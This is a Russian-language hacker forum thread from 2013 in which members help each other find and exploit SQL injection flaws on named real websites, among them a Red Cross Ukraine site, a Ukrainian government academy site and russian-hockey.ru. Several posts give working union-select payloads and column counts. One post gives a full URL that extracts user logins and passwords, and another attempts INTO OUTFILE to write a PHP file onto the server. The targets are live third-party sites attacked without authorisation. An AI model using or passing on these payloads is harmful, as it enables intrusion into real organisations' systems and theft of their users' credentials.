23.08.2013, 15:57
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от migjee
Помогите пожалуйста сначало я вывел базу, она не открывалась.Теперь ничего не делается.Люди посоветуйте через Havij иньекцию делал
вот тут уязвимость
http://rp-gameworld.ru/index.php?c=registration&action=reg
Раскрытие путей же. Где тут инъекцию увидел?
|
|
|
23.08.2013, 19:43
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
Код:
http://www.redcross.org.ua/modules/news/index.php?id=-999
Ошибка вызывается только при дефисе перед переменной, при подбирании столбцов всё рушиться, обойти пробелы /**/ не получается..
Текст ошибки: SELECT * FROM aadm_menu WHERE id=: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
SECOND QUESTION ============================
Код:
http://www.amnu.gov.ua/index.php?p=calendar&action=events&show=public&sys_monat=08&sys_jahr=2013&sys_tag=24+union+select+1+--+&area=1#999
Выдаёт следующие:
Код:
Notice: Use of undefined constant HTTP - assumed 'HTTP' in /sata2/home/users/estet/www/www.amnu.gov.ua/class/class.Response.php on line 70 Warning: Cannot modify header information - headers already sent by (output started at /sata2/home/users/estet/www/www.amnu.gov.ua/class/class.Response.php:70) in /sata2/home/users/estet/www/www.amnu.gov.ua/class/class.Response.php on line 71
Warning: Cannot modify header information - headers already sent by (output started at /sata2/home/users/estet/www/www.amnu.gov.ua/class/class.Response.php:70) in /sata2/home/users/estet/www/www.amnu.gov.ua/class/class.Redir.php on line 22
что-нибудь может с этого получится
3 ==== вот это ещё интересно
Код:
http://ua.oriflame.com/utils/messages/message.jhtml?textKey=conference_not_available'&_requestid=406406
Error: Could not find resourcestring: key: conference_not_available' bundleName: com.oriflame.bundles.oriLiteralBundle
Тут вообще выходит всплывающее окно и не даёт дальше крутить
Код:
http://www.goldnsilverfactory.com/sub.php?db_cid=178%27
http://www.titanchair.ca/sub.php?db_cid=2%27
|
|
|
|
26.08.2013, 11:32
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от Unknowhacker
[CODE]
Тут вообще выходит всплывающее окно и не даёт дальше крутить
Код:
http://www.goldnsilverfactory.com/sub.php?db_cid=178%27
http://www.titanchair.ca/sub.php?db_cid=2%27
Здесь фильтр, но select+union пропускает:
1 случай: +union+select+1,2,3,4,5,6,7,8,9,10+--+
2 случай: +union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+
В обоих случаях поле 2 - принтабельное.
|
|
|
|
26.08.2013, 13:04
|
|
Новичок
Регистрация: 23.02.2013
Сообщений: 14
С нами:
6956246
Репутация:
0
|
|
Можно ли здесь что-то сделать и в каком направлении рыть?
Код:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=1'
|
|
|
|
26.08.2013, 13:55
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от exstreme
Можно ли здесь что-то сделать и в каком направлении рыть?
Код:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=1'
Правильно определили уязвимый параметр usr_id.
Далее подбираем количество столбцов:
+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19+--+
Версия " 5.1.49-Max-log"
Вот в этом направлении.
|
|
|
|
26.08.2013, 14:20
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
Сообщение от exstreme
Можно ли здесь что-то сделать и в каком направлении рыть?
Код:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=1'
Вот держи раскрученная.. я так понял.. новичок..
Код:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=-1+union+select+1,2,3,4,5,6,7,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28rh_tppg.usr%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,lognme,0x3a,pwd%29%29%29%29x%29,9,10,11,12,13,14,15,16,17,18,19+--+
P.S См. ниже графа "Очки" И уберите пробелы в URL
|
|
|
|
26.08.2013, 18:20
|
|
Новичок
Регистрация: 23.02.2013
Сообщений: 14
С нами:
6956246
Репутация:
0
|
|
Сообщение от Unknowhacker
Вот держи раскрученная.. я так понял.. новичок..
Спс, есть немного такое, у меня с union не прокатывало, я что-то и подумал, что здесь версия
|
|
|
|
26.08.2013, 18:28
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
[QUOTE="exstreme"]
Спс, есть немного такое, у меня с union не прокатывало, я что-то и подумал, что здесь версия
p.s. согласно руководству по mysql переди послезнака комменария "--" cтавится пробел, т.е. +--+
|
|
|
|
26.08.2013, 19:45
|
|
Новичок
Регистрация: 23.02.2013
Сообщений: 14
С нами:
6956246
Репутация:
0
|
|
есть такое, спасибо, думал (%28) что пробел.
Код:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=-1+union+select+1,2,3,4,5,'%3C?php%20echo%20%22test%22;?%3E',7,8,9,10,11,12,13,14,15,16,17,18,19+INTO+OUTFILE+'tested.php'+--+
А это почему не срабатывает?
посмотрел я на столбцы таблицы, и так понимаю они находятся в отдельной таблице, а кроме того на сайте как минимум присутствуют джумловские таблицы. Ну и собственно вопрос, можно ли как-то к ним подключиться или только в пределах этой таблицы? |
|
|
|
26.08.2013, 20:07
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от exstreme
есть такое, спасибо, думал (%28) что пробел.
Код:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=-1+union+select+1,2,3,4,5,'%3C?php%20echo%20%22test%22;?%3E',7,8,9,10,11,12,13,14,15,16,17,18,19+INTO+OUTFILE+'tested.php'+--+
А это почему не срабатывает?
посмотрел я на столбцы таблицы, и так понимаю они находятся в отдельной таблице, а кроме того на сайте как минимум присутствуют джумловские таблицы. Ну и собственно вопрос, можно ли как-то к ним подключиться или только в пределах этой таблицы? Принтабельные колонки подразумевают ЧТЕНИЕ, а НЕ ВЫПОЛНЕНИЕ запрашиваемых данных.
Хотя я встречал исключения. Очень-очень-очень редко.
Максимум что тут можешь выкопать - это опять же SiXSS посредством пассивной XSS в клиентском браузере. Но это опять же, выполняется на клиенте, а не на сервере.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Комбинированный вид
